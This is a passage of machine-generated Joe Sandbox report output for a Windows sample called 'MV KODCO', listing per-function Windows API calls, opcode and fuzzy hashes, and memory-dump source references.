                                                          • Opcode ID: b56eb488317c11773d75607e231327c39bcb81e6f746af7fa5adfd5e08b61103
                                                          • Instruction ID: b1f52a30c27b607530fcf72eb5f34d5308ed6e33c8a52226961b53be5bf60c43
                                                          • Opcode Fuzzy Hash: b56eb488317c11773d75607e231327c39bcb81e6f746af7fa5adfd5e08b61103
                                                          • Instruction Fuzzy Hash: 9021783114093376C324BB24ED22EBB77DBEFA1300F50C42AF446A7181E7559982C7A4
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006209CB
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006209F1
                                                          • SysAllocString.OLEAUT32(00000000), ref: 006209F4
                                                          • SysAllocString.OLEAUT32 ref: 00620A15
                                                          • SysFreeString.OLEAUT32 ref: 00620A1E
                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00620A38
                                                          • SysAllocString.OLEAUT32(?), ref: 00620A46
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                          • String ID:
                                                          • API String ID: 3761583154-0
                                                          • Opcode ID: 0495654868883baf4a969d8c22e4754fe62047ef41e2fc32d809b5c73d10bc18
                                                          • Instruction ID: c9251b5e2cd054191746a7b66671739434ce4846807e4f2a0d756352ad17d5d1
                                                          • Opcode Fuzzy Hash: 0495654868883baf4a969d8c22e4754fe62047ef41e2fc32d809b5c73d10bc18
                                                          • Instruction Fuzzy Hash: 4D217475600214BFEB109FA8DC88DAB77EDEF483607408125F909CB262DAB4EC418B64
                                                          APIs
                                                            • Part of subcall function 005FD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005FD1BA
                                                            • Part of subcall function 005FD17C: GetStockObject.GDI32(00000011), ref: 005FD1CE
                                                            • Part of subcall function 005FD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 005FD1D8
                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0064A32D
                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0064A33A
                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0064A345
                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0064A354
                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0064A360
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                          • String ID: Msctls_Progress32
                                                          • API String ID: 1025951953-3636473452
                                                          • Opcode ID: 856c63333529d30ea8b98839ae02ae57a1a179de2802db71523c2603a2b309c4
                                                          • Instruction ID: c1a3a19aa9cad73f829b5483d62f52a82bd5bf7cd921e29ee54b1eabed84802a
                                                          • Opcode Fuzzy Hash: 856c63333529d30ea8b98839ae02ae57a1a179de2802db71523c2603a2b309c4
                                                          • Instruction Fuzzy Hash: 6F1193B1150119BEEF115FA4CC85EEB7F6EFF09798F014114FA04A6060C6729C22DBA4
                                                          APIs
                                                          • GetClientRect.USER32(?,?), ref: 005FCCF6
                                                          • GetWindowRect.USER32(?,?), ref: 005FCD37
                                                          • ScreenToClient.USER32(?,?), ref: 005FCD5F
                                                          • GetClientRect.USER32(?,?), ref: 005FCE8C
                                                          • GetWindowRect.USER32(?,?), ref: 005FCEA5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Rect$Client$Window$Screen
                                                          • String ID:
                                                          • API String ID: 1296646539-0
                                                          • Opcode ID: 1fada14f044d706ee4294f4deba93eadd48f52c0cb62b3719478d4f517a31ab9
                                                          • Instruction ID: 2daba1d8bbde0ca12e273ba48a92bbbcb5542013e6f7f0ac811b73485c0f46d2
                                                          • Opcode Fuzzy Hash: 1fada14f044d706ee4294f4deba93eadd48f52c0cb62b3719478d4f517a31ab9
                                                          • Instruction Fuzzy Hash: 69B15579A0024DDBDF14CFA8C5806EEBBB5BF08300F149529EE59EB250DB34AA50CB64
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00641C18
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00641C26
                                                          • __wsplitpath.LIBCMT ref: 00641C54
                                                            • Part of subcall function 00601DFC: __wsplitpath_helper.LIBCMT ref: 00601E3C
                                                          • _wcscat.LIBCMT ref: 00641C69
                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00641CDF
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00641CF1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                          • String ID:
                                                          • API String ID: 1380811348-0
                                                          • Opcode ID: 7fadd17f3983957db80326df0a277f768059108d42e5a7e114c539b00ef365c2
                                                          • Instruction ID: 9588f91e2b3163dadeaf1e0c8c382ff36e16372f7698902af6689242d8e56f4b
                                                          • Opcode Fuzzy Hash: 7fadd17f3983957db80326df0a277f768059108d42e5a7e114c539b00ef365c2
                                                          • Instruction Fuzzy Hash: E8518BB15043419BD324EF24C885EABBBEDFF88754F00491EF58697291EB70DA05CB96
                                                          APIs
                                                            • Part of subcall function 00643C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00642BB5,?,?), ref: 00643C1D
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006430AF
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006430EF
                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00643112
                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0064313B
                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0064317E
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0064318B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                          • String ID:
                                                          • API String ID: 3451389628-0
                                                          • Opcode ID: 915eb25ce0cb6348f87c2434ad47833f67a74416b68af5295d184da6e11a13cd
                                                          • Instruction ID: df3fde4cf7ad80f1bad9c57f35ce8d91af47bb8f82996b1f2eec4cd94b3d8c08
                                                          • Opcode Fuzzy Hash: 915eb25ce0cb6348f87c2434ad47833f67a74416b68af5295d184da6e11a13cd
                                                          • Instruction Fuzzy Hash: 16515A31604351AFC708EF64C985E6ABBFAFF88314F04491DF595872A1DB71EA06CB52
                                                          APIs
                                                          • GetMenu.USER32(?), ref: 00648540
                                                          • GetMenuItemCount.USER32(00000000), ref: 00648577
                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0064859F
                                                          • GetMenuItemID.USER32(?,?), ref: 0064860E
                                                          • GetSubMenu.USER32(?,?), ref: 0064861C
                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 0064866D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$CountMessagePostString
                                                          • String ID:
                                                          • API String ID: 650687236-0
                                                          • Opcode ID: 79956999c3b90922bbf1f4b33f825b2a3e02859cedba79568f394a505fc9e005
                                                          • Instruction ID: 0d11f8695d1515c079fcffd003d4bd4775c43cda794a1e40e36bee4248ceae62
                                                          • Opcode Fuzzy Hash: 79956999c3b90922bbf1f4b33f825b2a3e02859cedba79568f394a505fc9e005
                                                          • Instruction Fuzzy Hash: 4751BD31E00219AFCB55EF64C945AEEBBF6FF48310F114459E906BB391CB70AE418B94
                                                          APIs
                                                          • _memset.LIBCMT ref: 00624B10
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00624B5B
                                                          • IsMenu.USER32(00000000), ref: 00624B7B
                                                          • CreatePopupMenu.USER32 ref: 00624BAF
                                                          • GetMenuItemCount.USER32(000000FF), ref: 00624C0D
                                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00624C3E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                          • String ID:
                                                          • API String ID: 3311875123-0
                                                          • Opcode ID: 239c767313288023a0edd3ef5a938d923fe2c6e8aefc05e213cac24da61745a2
                                                          • Instruction ID: 1154d5ab064bf1c7bc329dcfad1f8e1414ce65836feacb18dcf4284bccf18d64
                                                          • Opcode Fuzzy Hash: 239c767313288023a0edd3ef5a938d923fe2c6e8aefc05e213cac24da61745a2
                                                          • Instruction Fuzzy Hash: 6751F370B01A69DFCF20CF68E888BEDBBF6AF44314F144159E815AB290DBB09940CF51
                                                          APIs
                                                          • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0067DC00), ref: 00638E7C
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00638E89
                                                          • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00638EAD
                                                          • #16.WSOCK32(?,?,00000000,00000000), ref: 00638EC5
                                                          • _strlen.LIBCMT ref: 00638EF7
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00638F6A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$_strlenselect
                                                          • String ID:
                                                          • API String ID: 2217125717-0
                                                          • Opcode ID: 3e1a29c1fd651f38e8c5aa48e13e53047131cdd826a5bad5c442db6306822bfa
                                                          • Instruction ID: e5fad121f3edadd9a23b375584d05718805e702ea6ce86e5d95ed9ee3688bdfd
                                                          • Opcode Fuzzy Hash: 3e1a29c1fd651f38e8c5aa48e13e53047131cdd826a5bad5c442db6306822bfa
                                                          • Instruction Fuzzy Hash: AE418171600205AFCB18EBA4DD89EEEBBBBAF58350F10455DF51697291DF709E40CBA0
                                                          APIs
                                                            • Part of subcall function 005FB34E: GetWindowLongW.USER32(?,000000EB), ref: 005FB35F
                                                          • BeginPaint.USER32(?,?,?), ref: 005FAC2A
                                                          • GetWindowRect.USER32(?,?), ref: 005FAC8E
                                                          • ScreenToClient.USER32(?,?), ref: 005FACAB
                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 005FACBC
                                                          • EndPaint.USER32(?,?,?,?,?), ref: 005FAD06
                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0065E673
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                          • String ID:
                                                          • API String ID: 2592858361-0
                                                          • Opcode ID: 93147987efe8b621a680309724b775cede006d02aa08fdcf436a8aade216ff56
                                                          • Instruction ID: b8ddeed5b3fa16cded70f82bfdf2863e5245446d9b427d40fc8e89bc3ce3ca6a
                                                          • Opcode Fuzzy Hash: 93147987efe8b621a680309724b775cede006d02aa08fdcf436a8aade216ff56
                                                          • Instruction Fuzzy Hash: E941B1B05002059FC710DF14CC84FB67BA9BB5A360F040659FAA8CB2A1C775AD44DB63
                                                          APIs
                                                          • ShowWindow.USER32(006A1628,00000000,006A1628,00000000,00000000,006A1628,?,0065DC5D,00000000,?,00000000,00000000,00000000,?,0065DAD1,00000004), ref: 0064E40B
                                                          • EnableWindow.USER32(00000000,00000000), ref: 0064E42F
                                                          • ShowWindow.USER32(006A1628,00000000), ref: 0064E48F
                                                          • ShowWindow.USER32(00000000,00000004), ref: 0064E4A1
                                                          • EnableWindow.USER32(00000000,00000001), ref: 0064E4C5
                                                          • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0064E4E8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Window$Show$Enable$MessageSend
                                                          • String ID:
                                                          • API String ID: 642888154-0
                                                          • Opcode ID: 17ca8c50dcbbde2f585cbdda0b5b0549b6767db054eac1f12be4ab207d69b2f0
                                                          • Instruction ID: 99c01de67335e219e16770377f8cb722c632aa4f6cdc0664cfc1f20c8e281d1c
                                                          • Opcode Fuzzy Hash: 17ca8c50dcbbde2f585cbdda0b5b0549b6767db054eac1f12be4ab207d69b2f0
                                                          • Instruction Fuzzy Hash: 16416034B01140EFDB22CF24C499BD47BE2BF09314F1981A9EA598F6A2C772E845CB51
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 006298D1
                                                            • Part of subcall function 005FF4EA: std::exception::exception.LIBCMT ref: 005FF51E
                                                            • Part of subcall function 005FF4EA: __CxxThrowException@8.LIBCMT ref: 005FF533
                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00629908
                                                          • EnterCriticalSection.KERNEL32(?), ref: 00629924
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0062999E
                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 006299B3
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 006299D2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 2537439066-0
                                                          • Opcode ID: 7cea4309a236918ebfb64d82f64b6aac2b814642337cf9fcdf162d506a65eb91
                                                          • Instruction ID: 5b394f1aa0340f3b63d0800fbae76a09591452e041948b1467d747f337b505fa
                                                          • Opcode Fuzzy Hash: 7cea4309a236918ebfb64d82f64b6aac2b814642337cf9fcdf162d506a65eb91
                                                          • Instruction Fuzzy Hash: 39318131E00115ABDB009F95DC89EAFBB79FF85710F1480A9FA04AB286D774DA10CBA0
                                                          APIs
                                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,006377F4,?,?,00000000,00000001), ref: 00639B53
                                                            • Part of subcall function 00636544: GetWindowRect.USER32(?,?), ref: 00636557
                                                          • GetDesktopWindow.USER32 ref: 00639B7D
                                                          • GetWindowRect.USER32(00000000), ref: 00639B84
                                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00639BB6
                                                            • Part of subcall function 00627A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00627AD0
                                                          • GetCursorPos.USER32(?), ref: 00639BE2
                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00639C44
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                          • String ID:
                                                          • API String ID: 4137160315-0
                                                          • Opcode ID: 4bb631181f7e3bb06a33cda358b073663065b36bd2faa62fc3615e54f1a04437
                                                          • Instruction ID: 33221e5a69025a1d51fbb082a2c91f517b29fc09983238d4ad9f851950b11c78
                                                          • Opcode Fuzzy Hash: 4bb631181f7e3bb06a33cda358b073663065b36bd2faa62fc3615e54f1a04437
                                                          • Instruction Fuzzy Hash: 1331C172604315ABD710DF14DC49F9BB7EAFF89314F00092AF586D7281DAB1E904CBA2
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0061AFAE
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 0061AFB5
                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0061AFC4
                                                          • CloseHandle.KERNEL32(00000004), ref: 0061AFCF
                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0061AFFE
                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 0061B012
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                          • String ID:
                                                          • API String ID: 1413079979-0
                                                          • Opcode ID: 34671a2a25f90936feeafb69b10aa0bbd611d34e9e1c8ba2ccb62f2ffcd1f7a3
                                                          • Instruction ID: ca826c340b833ba22da616ce160a6599e67b195045e8a9d4bd0a9323ad544ac2
                                                          • Opcode Fuzzy Hash: 34671a2a25f90936feeafb69b10aa0bbd611d34e9e1c8ba2ccb62f2ffcd1f7a3
                                                          • Instruction Fuzzy Hash: AC215072505209AFDF018FE4DD09FEE7BAAEF44304F084015F901A2261C376DD55EB61
                                                          APIs
                                                            • Part of subcall function 005FAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 005FAFE3
                                                            • Part of subcall function 005FAF83: SelectObject.GDI32(?,00000000), ref: 005FAFF2
                                                            • Part of subcall function 005FAF83: BeginPath.GDI32(?), ref: 005FB009
                                                            • Part of subcall function 005FAF83: SelectObject.GDI32(?,00000000), ref: 005FB033
                                                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0064EC20
                                                          • LineTo.GDI32(00000000,00000003,?), ref: 0064EC34
                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0064EC42
                                                          • LineTo.GDI32(00000000,00000000,?), ref: 0064EC52
                                                          • EndPath.GDI32(00000000), ref: 0064EC62
                                                          • StrokePath.GDI32(00000000), ref: 0064EC72
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                          • String ID:
                                                          • API String ID: 43455801-0
                                                          • Opcode ID: b76b5baf8b6a6c1c8cca565779bd620eb9d1349b0523d46e1387aceeb3caf552
                                                          • Instruction ID: 5878a25e1949b0b3d90f8f7a3d3079812a6379201d11cce2cdeed94855a26518
                                                          • Opcode Fuzzy Hash: b76b5baf8b6a6c1c8cca565779bd620eb9d1349b0523d46e1387aceeb3caf552
                                                          • Instruction Fuzzy Hash: D2111B7250014DBFEF029F90DD88EEA7F6EEB09354F049112FE1889160D7B19E55DBA0
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 0061E1C0
                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0061E1D1
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0061E1D8
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0061E1E0
                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0061E1F7
                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0061E209
                                                            • Part of subcall function 00619AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00619A05,00000000,00000000,?,00619DDB), ref: 0061A53A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
